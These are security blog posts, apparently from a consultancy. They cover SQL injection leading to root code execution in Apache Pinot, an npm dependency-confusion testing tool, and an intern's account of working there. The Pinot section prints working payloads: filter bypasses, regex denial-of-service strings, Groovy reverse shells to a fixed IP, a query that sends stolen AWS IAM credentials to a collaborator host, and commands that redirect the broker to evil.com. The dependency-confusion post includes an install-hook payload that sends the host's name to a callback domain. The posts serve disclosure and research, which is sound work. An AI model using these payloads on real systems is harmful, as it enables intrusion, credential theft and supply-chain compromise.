Maintains cluster metadata and manages other components. It serves admin endpoints and endpoints for uploading data.

Zookeeper

Apache Zookeeper is used to store cluster state and metadata. There may be multiple brokers, servers and controllers (LinkedIn claims to have more than 1000 nodes in a cluster), so Zookeeper is used to keep track of these nodes and which servers host which segments. Essentially it’s a hierarchical key-value store.

Setting Up a Test Environment

Following the Kubernetes quickstart in Minikube is an easy way to create a multi-node environment. The documentation walks through the steps to install the Pinot Helm chart, set up ingestion via Kafka, and expose port 9000 of the Controller to access the query editor and cluster management UI. If things break horrifically, you can just minikube delete to wipe everything and start again.

The only recommendations are to:

  • Set image.tag in kubernetes/helm/pinot/values.yaml to a specific Pinot release (e.g. release-0.10.0) rather than latest to test a specific version.
  • Install the Pinot chart from ./kubernetes/helm/pinot to use your local configuration changes rather than pinot/pinot which fetches values from the Github master branch.
  • Use stern -n pinot-quickstart pinot to tail logs from all nodes.

Pinot SQL Syntax & Injection Basics

While Pinot syntax is based on Apache Calcite, many features in the Calcite reference are unsupported in Pinot. Here are some useful language features which may help to identify and test a Pinot backend.

Strings

Strings are surrounded by single-quotes. Single-quotes can be escaped with another single-quote. Double quotes denote identifiers e.g. column names.

String concatenation

Performed by the 3-parameter function CONCAT(str1, str2, separator). The + sign only works with numbers.

SELECT "someColumn", 'a ''string'' with quotes', CONCAT('abc','efg','d') FROM myTable

Substrings

SUBSTR(col, startIndex, endIndex) where indexes start at 0 and can be negative to count from the end. This is different from Postgres and MySQL where the last parameter is a length.

SELECT SUBSTR('abcdef', -3, -1) FROM ignoreMe -- 'def'

Length

LENGTH(str)

Comments

Line comments -- do not require surrounding whitespace. Multiline comments /* */ raise an error if the closing */ is missing.

Filters

Basic WHERE filters need to reference a column. Filters which do not operate on any column will raise errors, so SQLi payloads such as ' OR ''=' will fail:

SELECT * FROM airlineStatsAvro
WHERE 1 = 1
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 1 should not be null.
-- Potentially invalid column name specified.
SELECT * FROM airlineStatsAvro
WHERE year(NOW()) > 0
-- QueryExecutionError:
-- java.lang.NullPointerException: ColumnMetadata for 2022 should not be null.
-- Potentially invalid column name specified.

As long as you know a valid column name, you can still return all records e.g.:

SELECT * FROM airlineStatsAvro
WHERE 0 = Year - Year AND ArrTimeBlk != 'blahblah-bc'

BETWEEN

SELECT * FROM transcript WHERE studentID between 201 and 300

IN

Use col IN (literal1, literal2, ...).

SELECT * FROM transcript WHERE UPPER(firstName) IN ('NICK','LUCY')

String Matching

In LIKE filters, % and _ are converted to regular expression patterns .* and .

The REGEXP_LIKE(col, regex) function uses a java.util.regex.Pattern case-insensitive regular expression.

WHERE REGEXP_LIKE(alphabet, '^a[Bcd]+.*z$')

Both methods are vulnerable to Denial of Service (DoS) if users can provide their own unsanitised search queries e.g.:

  • LIKE '%%%%%%%%%%%%%zz'
  • REGEXP_LIKE(col, '((((((.*)*)*)*)*)*)*zz')

These filters will run on the Pinot server at close to 100% CPU forever (OK, for a very very long time depending on the data in the column).

UNION

No.

Stacked / Batched Queries

Nope.

JOIN

Limited support for joins is in development. Currently it is possible to join with offline tables with the lookUp function.

Subqueries

Limited support. The subquery is supposed to return a base64-encoded IdSet. An IdSet is a data structure (compressed bitmap or Bloom filter) where it is very fast to check if an Id belongs in the IdSet. The IN_SUBQUERY (filtered on Broker) or IN_PARTITIONED_SUBQUERY (filtered on Server) functions perform the subquery and then use this IdSet to filter results from the main query.

WHERE IN_SUBQUERY(
  yearID,
  'SELECT ID_SET(yearID) FROM baseballStats WHERE teamID = ''BC'''
  ) = 1

Database Version

It is common to SELECT @@VERSION or SELECT VERSION() when fingerprinting database servers. Pinot lacks this feature. Instead, the presence or absence of functions and other language features must be used to identify a Pinot server version.

Information Schema Tables

No.

Data Types

Some Pinot functions are sensitive to the column types in use (INT, LONG, BYTES, STRING, FLOAT, DOUBLE). The hash functions like SHA512, for instance, will only operate on BYTES columns and not STRING columns. Luckily, we can find the undocumented toUtf8 function in the source code and convert strings into bytes:

SELECT md5(toUtf8(somestring)) FROM table

CASE

Simple case:

SELECT
  CASE firstName WHEN 'Lucy' THEN 1 WHEN 'Bob', 'Nick' THEN 2 ELSE 'x' END
FROM transcript

Searched case:

SELECT
  CASE WHEN firstName = 'Lucy' THEN 1 WHEN firstName = 'Bob' THEN 2.1 ELSE 'x' END
FROM transcript

Query Options

Certain query options such as timeouts can be added with OPTION(key=value,key2=value2). Strangely enough, this can be added anywhere inside the query, and I mean anywhere!

SELECT studentID, firstOPTION(timeoutMs=1)Name
froOPTION(timeoutMs=1)m tranOPTION(timeoutMs=2)script
WHERE firstName OPTION(timeoutMs=1000) = 'Lucy'
-- succeeds as the final timeoutMs is long (1000ms)

SELECT * FROM transcript WHERE REGEXP_LIKE(firstName, 'LuOPTION(timeoutMs=1)cy')
-- BrokerTimeoutError:
-- Query timed out (time spent: 4ms, timeout: 1ms) for table: transcript_OFFLINE before scattering the request
--
-- With timeout 10ms, the error is:
-- 427: 1 servers [pinot-server-0_O] not responded
--
-- With an even larger timeout value the query succeeds and returns results for 'Lucy'.

Yes, even inside strings!

In a Pinot-backed search API, queries for thingumajig and thinguOPTION(a=b)majig should return identical results, assuming the characters ()= are not filtered by the API.

This is also potentially a useful WAF bypass.

They're the same picture meme

CTF-grade SQL injection

In far-fetched scenarios, this could be used to comment out parts of a SQL query, e.g. a route /getFiles?category=)&title=%25oPtIoN( using a prepared statement to produce the SQL:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%oPtIoN('
  and topSecret = false
  and category LIKE ')'

Everything between OPTION( and the next ) is stripped out using regex /option\s*\([^)]+\)/i. The query gets executed as:

SELECT * FROM gchqFiles
WHERE
  title LIKE '%'

allowing access to all the top secret files!

Note that the error OPTION statement requires two parts separated by '=' occurs if there are the wrong number of equals signs inside the OPTION().

Another contrived scenario could result in SQLi and a filter bypass.

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, 'oPtIoN(a=b')
  and not topSecret
  and category = ') OR id - id = 0--'

will be processed as

SELECT * FROM gchqFiles
WHERE
  REGEXP_LIKE(title, '
  and not topSecret
  and category = ') OR id - id = 0

Timeouts

Timeouts do not work. While the Broker returns a timeout exception to the client when the query timeout is reached, the Server continues processing the query row by row until completion, however long that takes. There is no way to cancel an in-progress query besides killing the Server process.

SQL Injection in Pinot

To proceed, you’ll need a SQL injection vulnerability like for any type of database backend, where malicious user input can wind up in the query body rather than being sent as parameters with prepared statements.

Pinot backends do not support prepared statements, but the Java client has a PreparedStatement class which escapes single quotes before sending the request to the Broker and can prevent SQLi (except the OPTION() variety).

Injection may appear in a search query such as:

query = """SELECT order_id, order_details_json FROM orders
WHERE store_id IN ({stores})
  AND REGEXP_LIKE(product_name,'{query}')
  AND refunded = false""".format(
    stores=user.stores,
    query=request.query,
)

The query parameter can be abused for SQL injection to return all orders in the system without the restriction to specific store IDs. An example payload is !xyz') OR store_id - store_id = 0 OR (product_name = 'abc! which will produce the following SQL query:

SELECT order_id, order_details_json FROM orders
WHERE store_id IN (12, 34, 56)
  AND REGEXP_LIKE(product_name,'!xyz') OR store_id - store_id = 0 OR (product_name = 'abc!')
  AND refunded = false

The logical split happens on the OR, so records will be returned if either:

  • store_id IN (12, 34, 56) AND REGEXP_LIKE(product_name,'!xyz') (unlikely to have any results)
  • store_id - store_id = 0 (always true, so all records are returned)
  • (product_name = 'abc!') AND refunded = false (unlikely to have any results)

If the query template used by the target has no new lines, the query can alternatively be ended with a line comment !xyz') OR store_id - store_id = 0--.

RCE via Groovy

While maturity is bringing improvements, secure design has not always been a priority. Pinot trusts anyone who can query the database to also execute code on the Server, as root 😲. This feature gaping security hole is enabled by default in all released versions of Apache Pinot. It was disabled by default in a commit on May 17, 2022 but this commit has not yet made it into a release.

Scripts are written in the Groovy language. This is a JVM-based language, allowing you to use all your favourite Java methods. Here’s some Groovy syntax you might care about:

// print to Server log (only going to be useful when testing locally)
println 3
// make a variable
def data = 'abc'
// interpolation by using double quotes and $ARG or ${ARG}
def moredata = "${data}def"  // abcdef
// execute shell command, wait for completion and then return stdout
'whoami'.execute().text
// launch shell command, but do not wait for completion
"touch /tmp/$arg0".execute()
// execute shell command with array syntax, helps avoid quote-escaping hell
["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/53 0>&1 &"].execute()
// a semicolon must be placed after the final closing bracket of an if-else block
if (true) { a() } else { b() }; return "a"

To execute Groovy, use:

GROOVY(
  '{"returnType":"INT or STRING or some other data type","isSingleValue":true}',
  'groovy code on one line',
  MaybeAColumnName,
  MaybeAnotherColumnName
)

If columns (or transform functions) are specified after the groovy code, they appear as variables arg0, arg1, etc. in the Groovy script.

RCE Example Queries

Whoami

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "whoami".execute().text; return 1'
) = 1 limit 5

Prints root to the log! The official Pinot docker images run Groovy scripts as root.

Note that:

  1. The Groovy function is an exception to the earlier rule requiring filters to include a column name.
  2. Even though the limit is 5, every row in each segment being searched is processed. Once 5 rows are reached, the query returns results to the Broker, but the root lines continue being printed to the log.
  3. The return and comparison values need not be the same. However the types must match returnType in the metadata JSON (here INT).
  4. The return keyword is optional for the final statement, so the script could could end with ; 1.
SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  'println "hello $arg0"; "touch /tmp/id-$arg0".execute(); 42',
  id
) = 3

In /tmp, expect root-owned files id-1, id-2, id-3, etc. for each row.

AWS

Steal temporary AWS IAM credentials from pinot-server.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'def aws = "169.254.169.254/latest/meta-data/iam/security-credentials/";',
    'def collab = "xyz.burpcollaborator.net/";',
''),'def role = "curl -s ${aws}".execute().text.split("\n")[0].trim();',
''),'def creds = "curl -s ${aws}${role}".execute().text;',
''),'["curl", collab, "--data", creds].execute(); 0',
  '')
) = 1

Could give access to cloud resources like S3. The code can of course be adapted to work with IMDSv2.

Reverse Shell

The goal is really to have a root shell from which to explore the cluster at your leisure without your commands appearing in query logs. You can use the following:

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/443 0>&1 &"].execute(); return 1'
) = 1

to spawn loads of reverse shells at the same time, one per row.

root@pinot-server-1:/opt/pinot#

You will be root on whichever Server instances are chosen by the broker based on which Servers contain the required table segments for the query.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"STRING","isSingleValue":true}',
  '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute().text'
) = 'x'

This launches one reverse shell. If you accidentally kill the shell, however far into the future, a new reverse shell attempt will be spawned as the Server processes the next row. Yes, the client and Broker will see the query timeout, but the Server will continue executing the query until completion.

Tuning

When coming across Pinot for the first time on an engagement, we used a Groovy query similar to the AWS one above. However, as you can already guess, this launched tens of thousands of requests at Burp Collaborator over a span of several hours with no way to stop the runaway query besides confessing our sin to the client.

To avoid spawning thousands of processes and causing performance degradation and potentially a Denial of Service, limit execution to a single row with an if statement in Groovy.

SELECT * FROM myTable WHERE groovy(
  '{"returnType":"INT","isSingleValue":true}',
  CONCAT(CONCAT(CONCAT(CONCAT(
    'if (arg0 == "489") {',
    '["bash", "-c", "bash -i >& /dev/tcp/192.168.0.4/4444 0>&1 &"].execute();',
''),'return 1;',
''),'};',
''),'return 0',
  ''),
  id
) = 1

A reverse shell is spawned only for the one row with id 489.

Use RCE on Server to Attack Other Nodes

We have root access to a Server via our reverse shell, giving us access to:

  • All the segment data stored on the Server
  • Configuration and environment variables with the locations of other services such as Broker and Zookeeper
  • Potentially keys to the cloud environment with juicy IAM permissions

As we’re root here already, let’s try to use our foothold to affect other parts of the Pinot cluster such as Zookeeper, Brokers, Controllers, and other Servers.

First we should check the configuration.

root@pinot-server-1:/opt/pinot# cat /proc/1/cmdline | sed 's/\x00/ /g'
/usr/local/openjdk-11/bin/java -Xms512M ... -Xlog:gc*:file=/opt/pinot/gc-pinot-server.log -Dlog4j2.configurationFile=/opt/pinot/conf/log4j2.xml -Dplugins.dir=/opt/pinot/plugins -Dplugins.dir=/opt/pinot/plugins -classpath /opt/pinot/lib/*:...:/opt/pinot/plugins/pinot-file-system/pinot-s3/pinot-s3-0.10.0-SNAPSHOT-shaded.jar -Dapp.name=pinot-admin -Dapp.pid=1 -Dapp.repo=/opt/pinot/lib -Dapp.home=/opt/pinot -Dbasedir=/opt/pinot org.apache.pinot.tools.admin.PinotAdministrator StartServer -clusterName pinot -zkAddress pinot-zookeeper:2181 -configFileName /var/pinot/server/config/pinot-server.conf

We have a Zookeeper address -zkAddress pinot-zookeeper:2181 and config file location -configFileName /var/pinot/server/config/pinot-server.conf. The file contains data locations and auth tokens in the unlikely event that internal cluster authentication has been enabled.

Zookeeper

It is likely that the locations of other services are available as environment variables, however the source of truth is Zookeeper. Nodes must be able to read and write to Zookeeper to update their status.

root@pinot-server-1:/opt/pinot# cd /tmp
root@pinot-server-1:/tmp# wget -q https://dlcdn.apache.org/zookeeper/zookeeper-3.8.0/apache-zookeeper-3.8.0-bin.tar.gz && tar xzf apache-zookeeper-3.8.0-bin.tar.gz
root@pinot-server-1:/tmp# ./apache-zookeeper-3.8.0-bin/bin/zkCli.sh -server pinot-zookeeper:2181
Connecting to pinot-zookeeper:2181
...
2022-06-06 20:53:52,385 [myid:pinot-zookeeper:2181] - INFO  [main-SendThread(pinot-zookeeper:2181):o.a.z.ClientCnxn$SendThread@1444] - Session establishment complete on server pinot-zookeeper/10.103.140.149:2181, session id = 0x10000046bac0016, negotiated timeout = 30000
...
[zk: pinot-zookeeper:2181(CONNECTED) 0] ls /pinot/CONFIGS/PARTICIPANT
[Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099, Controller_pinot-controller-0.pinot-controller-headless.pinot-quickstart.svc.cluster.local_9000, Minion_pinot-minion-0.pinot-minion-headless.pinot-quickstart.svc.cluster.local_9514, Server_pinot-server-0.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098, Server_pinot-server-1.pinot-server-headless.pinot-quickstart.svc.cluster.local_8098]

Now we have the list of “participants” in our Pinot cluster. We can get the configuration of a Broker:

[zk: pinot-zookeeper:2181(CONNECTED) 1] get /pinot/CONFIGS/PARTICIPANT/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099
{
  "id" : "Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099",
  "simpleFields" : {
    "HELIX_ENABLED" : "true",
    "HELIX_ENABLED_TIMESTAMP" : "1654547467392",
    "HELIX_HOST" : "pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local",
    "HELIX_PORT" : "8099"
  },
  "mapFields" : { },
  "listFields" : {
    "TAG_LIST" : [ "DefaultTenant_BROKER" ]
  }
}

By modifying the broker HELIX_HOST in Zookeeper (using set), Pinot queries will be sent via HTTP POST to /query/sql on a machine you control rather than the real broker. You can then reply with your own results. While powerful, this is a rather disruptive attack.

In further mitigation, it will not affect services which send requests directly to a hardcoded Broker address. Many clients do rely on Zookeeper or the Controller to locate the broker, and these clients will be affected. We have not investigated whether intra-cluster mutual TLS would downgrade this attack to DoS.

Broker

We discovered the location of the broker. Its HELIX_PORT refers to the an HTTP server used for submitting SQL queries:

curl -H "Content-Type: application/json" -X POST \
   -d '{"sql":"SELECT X FROM Y"}' \
   http://pinot-broker-0:8099/query/sql

Sending queries directly to the broker may be much easier than via the SQLi endpoint. Note that the broker may have basic auth enabled, but as with all Pinot services it is disabled by default.

All Pinot REST services also have an /appconfigs endpoint returning configuration, environment variables and java versions.

Other Servers

There may be data which is only present on other Servers. From your reverse shell, SQL queries can be sent to any other Server via GRPC without requiring authentication.

Alternatively, we can go back and use Pinot’s IdSet subquery functionality to get shells on other Servers. We do this by injecting an IN_SUBQUERY(columnName, subQuery) filter into our original query to tableA to produce SQL like:

SELECT * FROM tableA
  WHERE
    IN_SUBQUERY(
      'x',
      'SELECT ID_SET(firstName) FROM tableB WHERE groovy(''{"returnType":"INT","isSingleValue":true}'',''println "RCE";return 3'', studentID)=3'
    ) = true

It is important that the tableA column name (here the literal 'x') and the ID_SET column of the subquery have the same type. If an integer column from tableB is used instead of firstName, the 'x' must be replaced with an integer.

We now get RCE on the Servers holding segments of tableB.

Controller

The Controller also has a useful REST API.

It has methods for getting and setting data such as cluster configuration, table schemas, instance information and segment data.

It can be used to interact with Zookeeper e.g. to update the broker host like was done directly via Zookeeper above.

curl -X PUT "http://localhost:9000/instances/Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099?updateBrokerResource=true" -H  "accept: application/json" -H  "Content-Type: application/json" -d "{  \"instanceName\": \"Broker_pinot-broker-0.pinot-broker-headless.pinot-quickstart.svc.cluster.local_8099\",  \"host\": \"evil.com\",  \"enabled\": true,  \"port\": \"8099\",  \"tags\": [\"DefaultTenant_BROKER\"],  \"type\":\"BROKER\",  \"pools\": null,  \"grpcPort\": -1,  \"adminPort\": -1,  \"systemResourceInfo\": null}"

Files can also be uploaded for ingestion into tables.

TLDR

  • Pinot is a modern database platform that can be attacked with old-school SQLi
  • SQL injection leads to Remote Code Execution by default in the latest release, at the time of writing
  • In the official container images, RCE means root on the Server component of the Pinot cluster
  • From here, other components can be affected to a certain degree
  • WTF is going on with OPTION()?
  • Pinot is under active development. Maturity will bring security improvements
  • In an upcoming release (>0.10.0) the SQLi to RCE footgun will be opt-in

Dependency Confusion

20 July 2022 at 22:00

On Feb 9th, 2022 PortSwigger announced Alex Birsan’s Dependency Confusion as the winner of the Top 10 web hacking techniques of 2021. Over the past year this technique has gained a lot of attention. Despite that, in-depth information about hunting for and mitigating this vulnerability is scarce.

I have always believed the best way to understand something is to get hands-on experience. In the following post, I’ll show the results of my research that focused on creating an all-around tool (named Confuser) to test and exploit potential Dependency Confusion vulnerabilities in the wild. To validate the effectiveness, we looked for potential Dependency Injection vulnerabilities in top ElectronJS applications on Github (spoiler: it wasn’t a great idea!).

The tool has helped Doyensec during engagements to ensure that our clients are safe from this threat, and we believe it can facilitate testing for researchers and blue-teams too.

So… what is Dependency Confusion?

Dependency confusion is an attack against the build process of the application. It occurs as a result of a misconfiguration of the private dependency repositories. Vulnerable configurations allow downloading versions of local packages from a main public repository (e.g., registry.npmjs.com for NPM). When a private package is registered only in a local repository, an attacker can upload a malicious package to the main repository with the same name and higher version number. When a victim updates their packages, malicious code will be downloaded and executed on a build or developer machine.

Why is it so hard to study Dependency Injection?

There are multiple reasons why, despite all the attention, Dependency Confusion seems to be so unexplored.

There are plenty of dependency management systems

Each programming language utilizes different package management tools, most with their own repositories. Many languages have multiple of them. JavaScript alone has NPM, Yarn and Bower to name a few. Each tool comes with its own ecosystem of repositories, tools, options for local package hosting (or lack thereof). It is a significant time cost to include another repository system when working with projects utilizing different technology stacks.

In my research I have decided to focus on the NPM ecosystem. The main reason for that is its popularity. It’s a leading package management system for JavaScript and my secondary goal was to test ElectronJS applications for this vulnerability. Focusing on NPM would guarantee coverage on most of the target applications.

Actual exploitation requires interaction with 3rd party services

In order to exploit this vulnerability, the researcher needs to upload a malicious package to a public repository. Rightly so, most of them actively work against such practices. On NPM, malicious packages are flagged and removed along with banning of the owner account.

During the research, I was interested in observing how much time an attacker has before their payload is removed from the repository. Additionally, NPM is not actually a target of the attack, so among my goals was to minimize the impact on the platform itself and its users.

Reliable information extraction from targets is hard

In the case of a successful exploitation, a target machine is often a build machine inside a victim organization’s network. While it is a great reason why this attack is so dangerous, extracting information from such a network is not always an easy task.

In his original research, Alex proposes DNS extraction technique to extract information of attacked machines. This is the technique I have decided to use too. It requires a small infrastructure with a custom DNS server, unlike most web exploitation attacks, where often only an HTTP Proxy or browser is enough. This highlights why building tools such as mine is essential, if the community is to hunt these bugs reliably.

The tool

So, how to deal with those problems? I have decided to try and create Confuser - a tool that attempts to solve the aforementioned issues.

The tool is OSS and available at https://github.com/doyensec/confuser.

Be respectful and don’t create problems to our friends at NPM!

The process

Researching any Dependency Confusion vulnerability consists of three steps.

Step 1) Reconnaissance

Finding Dependency Confusion bugs requires a package file that contains a list of application dependencies. In case of projects utilizing NPM, the package.json file holds such information:

{
  "name": "Doyensec-Example-Project",
  "version": "1.0.0",
  "description": "This is an example package. It uses two dependencies: one is a public one named axios. The other one is a package hosted in a local repository named doyensec-library.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": {
    "axios": "^0.25.0",
    "doyensec-local-library": "~1.0.1",
    "another-doyensec-lib": "~2.3.0"
  }
}

When a researcher finds a package.json file, their first task is to identify potentially vulnerable packages. That means packages that are not available in the public repository. The process of verifying the existence of a package seems pretty straightforward. Only one HTTP request is required. If a response status code is anything but 200, the package probably does not exist:

def check_package_exists(package_name):
    response = requests.get(NPM_ADDRESS + "package/" + package_name, allow_redirects=False)

    return (response.status_code == 200)

Simple? Well… almost. NPM also allows scoped package names formatted as follows: @scope-name/package-name. In this case, package can be a target for Dependency Confusion if an attacker can register a scope with a given name. This can be also verified by querying NPM:

def check_scope_exists(package_name):
    split_package_name = package_name.split('/')
    scope_name = split_package_name[0][1:]
    response = requests.get(NPM_ADDRESS + "~" + scope_name, alow_redirects=False)

The tool I have built allows the streamlining of this process. A researcher can upload a package.json file to my web application. In the backend, the file will be parsed, and have its dependencies iterated. As a result, a researcher receives a clear table with potentially vulnerable packages and the versions for a given project:

Vulnerable packages view

The downside of this method is the fact, that it requires enumerating the NPM service and dozens of HTTP requests per each project. In order to ease the strain put on the service, I have decided to implement a local cache. Any package name that has been once identified as existing in the NPM registry is saved in the local database and skipped during consecutive scans. Thanks to that, there is no need to repeatedly query the same packages. After scanning about 50 package.json files scraped from Github I have estimated that the caching has decreased the number of required requests by over 40%.

Step 2) Payload generation and upload

Successful exploitation of a Dependency Confusion vulnerability requires a package that will call home after it has been installed by the victim. In the case of the NPM, the easiest way to do this is by exploiting install hooks. NPM packages allow hooks that ran each time a given package is installed. Such functionality is the perfect place for a dependency payload to be triggered. The package.json template I used looks like the following:

{
  "name": {package_name},
  "version": {package_version},
  "description": "This package is a proof of concept used by Doyensec LLC to conduct research. It has been uploaded for test purposes only. Its only function is to confirm the installation of the package on a victim's machines. The code is not malicious in any way and will be deleted after the research survey has been concluded. Doyensec LLC does not accept any liability for any direct, indirect, or consequential loss or damage arising from the use of, or reliance on, this package.",
  "main": "index.js",
  "author": "Doyensec LLC <[email protected]>",
  "license": "ISC",
  "dependencies": { },
  "scripts": {
    "install": "node extract.js {project_id}"
  }
}

Please note the description that informs users and maintainers about the purpose of the package. It is an attempt to distinguish the package from a malicious one, and it serves to inform both NPM and potential victims about the nature of the operation.

The install hook runs the extract.js file which attempts to extract minimal data about the machine it has been run on:

const https = require('https');
var os = require("os");
var hostname = os.hostname();

const data = new TextEncoder().encode(
  JSON.stringify({
    payload: hostname,
    project_id: process.argv[2]
  })
);

const options = {
  hostname: process.argv[2] + '.' + hostname + '.jylzi8mxby9i6hj8plrj0i6v9mff34.burpcollaborator.net',
  port: 443,
  path: '/',
  method: 'POST',
  headers: {
    'Content-Type': 'application/json',
    'Content-Length': data.length
  },
  rejectUnauthorized: false
}

const req = https.request(options, res => {});
req.write(data);
req.end();

I’ve decided to save time on implementing a fake DNS server and use the existing infrastructure provided by Burp Collaborator. The file will use a given project’s ID and victim’s hostname as subdomains and try to send an HTTP request to the Burp Collaborator domain. This way my tool will be able to assign callbacks to proper projects along with the victims’ hostnames.

After the payload generation, the package is published to the public NPM repository using the npm command itself: npm publish.

Step 3) Callback aggregation

The final step in the chain is receiving and aggregating the callbacks. As stated before, I have decided to use a Burp Collaborator infrastructure. To be able to download callbacks to my backend I have implemented a simple Burp Collaborator client in Python:

class BurpCollaboratorClient():

    BURP_DOMAIN = "polling.burpcollaborator.net"

    def __init__(self, colabo_key, colabo_subdomain):
        self.colabo_key = colabo_key
        self.colabo_subdomain = colabo_subdomain

    def poll(self):
        params = {"biid": self.colabo_key}
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"}

        response = requests.get(
            "https://" + self.BURP_DOMAIN + "/burpresults", params=params, headers=headers)#, proxies=PROXIES, verify=False)

        if response.status_code != 200:
            raise Error("Failed to poll Burp Collaborator")

        result_parsed = json.loads(response.text)
        return result_parsed.get("responses", [])

After polling, the returned callbacks are parsed and assigned to the proper projects. For example if anyone runs npm install on an example project I have shown before, it’ll render the following callbacks in the application:

Callbacks

Test run

To validate the effectiveness of Confuser, we decided to test Github’s top 50 ElectronJS applications.

I have extracted a list of Electron Applications from the official ElectronJS repository available here. Then, I used the Github API to sort the repositories by the number of stars. For the top 50, I have scraped the package.json files.

This is the Node script to scrape the files:

for (i = 0; i < 50 && i < repos.length;) {
    let repo = repos[i]
    await octokit
      .request("GET /repos/" + repo.repo + "/commits?per_page=1", {})
      .then((response) => {
        var sha = response.data[0].sha
        return octokit.request("GET /repos/" + repo.repo + "/git/trees/:sha?recursive=1", {
          "sha": sha
        });
      })
      .then((response) => {
        for (file_index in response.data.tree) {
          file = response.data.tree[file_index];
          if (file.path.endsWith("package.json")) {
            return octokit.request("GET /repos/" + repo.repo + "/git/blobs/:sha", {
              "sha": file.sha
            });
          }
        }

        return null;
      })
      .then((response) => {
        if (!response) return null;
        i++;
        var package_json = Buffer.from(response.data.content, 'base64').toString('utf-8');
        repoNameSplit = repo.repo.split('/');
        return fs.writeFileSync("package_jsons/" + repoNameSplit[0]+ '_' + repoNameSplit[1] + ".json", package_json);
      });
  }

The script takes the newest commit from each repo and then recursively searches its files for any named package.json. Such files are downloaded and saved locally.

After downloading those files, I uploaded them to the Confuser tool. It resulted in scanning almost 3k dependency packages. Unfortunately only one application had some potential targets. As it turned out, it was taken from an archived repository, so despite having a “malicious” package in the NPM repository for over 24h (after which, it was removed by NPM) I’d received no callbacks from the victim. I had received a few callbacks from some machines that seemed to have downloaded the application for analysis. This also highlighted a problem with my payload - getting only the hostname of the victim might not be enough to distinguish an actual victim from false positives. A more accurate payload might involve collecting information such as local paths and local users which opens up to privacy concerns.

Example false positives: False positives

In hindsight, it was a pretty naive approach to scrape package.json files from public repositories. Open Source projects most likely use only public dependencies and don’t rely on any private infrastructures. On the last day of my research, I downloaded a few closed source Electron apps. Unpacking them, I was able to extract the package.json in many cases but none yield any interesting results.

Summary

We’re releasing Confuser - a newly created tool to find and test for Dependency Confusion vulnerabilities. It allows scanning packages.json files, generating and publishing payloads to the NPM repository, and finally aggregating the callbacks from vulnerable targets.

This research has allowed me to greatly increase my understanding of the nature of this vulnerability and the methods of exploitation. The tool has been sufficiently tested to work well during Doyensec’s engagements. That said, there are still many improvements that can be done in this area:

  • Implement its own DNS server or at least integrate with Burp’s self-hosted Collaborator server instances

  • Add support for other languages and repositories

Additionally, there seems to be several research opportunities in the realm of Dependency Confusion vulnerabilities:

  • It seems promising to expand the research to closed-source ElectronJS applications. While high profile targets like Microsoft will probably have their bases covered in that regard (also because they were targeted by the original research), there might be many more applications that are still vulnerable

  • Researching other dependency management platforms. The original research touches on NPM, Ruby Gems, Python’s PIP, JFrog and Azure Artifacts. It is very likely that similar problems exist in other environments

My Internship Experience at Doyensec

23 August 2022 at 22:00

Throughout the Summer of 2022, I worked as an intern for Doyensec. I’ll be describing my experience with Doyensec in this blog post so that other potential interns can decide if they would be interested in applying.

The Recruitment Process

The recruitment process began with a non-technical call about the internship to make introductions and exchange more information. Once everyone agreed it was a fit, we scheduled a technical challenge where I was given two hours to provide my responses. I enjoyed the challenge and did not find it to be a waste of time. After the technical challenge, I had two technical interviews with different people (Tony and John). I thought these went really well for questions about web security, but I didn’t know the answers to some questions about other areas of application security I was less familiar with. Since Doyensec performs assessments of non-web applications as well (mobile, desktop, etc.), it made sense that they would ask some questions about non-web topics. After the final call, I was provided with an offer via email.

The Work

As an intern, my time was divided between working on an internal training presentation, conducting research, and performing security assessments. Creating the training presentation allowed me to learn more about a technical topic that will probably be useful for me in the future, whether at Doyensec or not. I used some of my research time to learn about the topic and make the presentation. My presentation was on the advanced features of Semgrep, the open-source static code analysis tool. Doyensec often has cross-training sessions where members of the team demonstrate new tools and techniques, or just the latest “Best Bug” they found on an engagement.

Conducting research was a good experience as an intern because it allowed me to learn more about the research topic, which in my case was Electron and its implementation of web API permissions. Don’t worry too much about not having a good research topic of your own already – there are plenty of things that have already been selected as options, and you can ask for help choosing a topic if you’re not sure what to research. My research topic was originally someone else’s idea.

My favorite part of the internship was helping with security assessments. I was able to work as a normal consultant with some extra guidance. I learned a lot about different web frameworks and programming languages. I was able to see what technologies real companies are using and review real source code. For example, before the internship, I had very limited experience with applications written in Go, but now I feel mostly comfortable testing Go web applications. I also learned more about mobile applications, which I had limited experience with. In addition to learning, I was able to provide actionable findings to businesses to help reduce their risk. I found vulnerabilities of all severities and wrote reports for these with recommended remediation steps.

Should You Become an Intern?

When I was looking for an internship, I wanted to find a role that would let me learn a lot. Most of the other factors were low-priority for me because the role is temporary. If you really enjoy application security and want to learn more about it, this internship is a great way to do that. The people at Doyensec are very knowledgeable about a wide variety of application security topics, and are happy to share their knowledge with an intern.

Even though my priority was learning, it was also nice that the work is performed remotely and with flexible hours. I found that some days I preferred to stop work at around 2-3 PM and then continue in the night. I think these conditions are desirable to anyone, not just interns.

As for qualifications, Doyensec has stated that the ideal candidate:

  • Already has some experience with manual source code review and Burp Suite / OWASP ZAP
  • Learns quickly
  • Should be able to prepare reports in English
  • Is self-organized
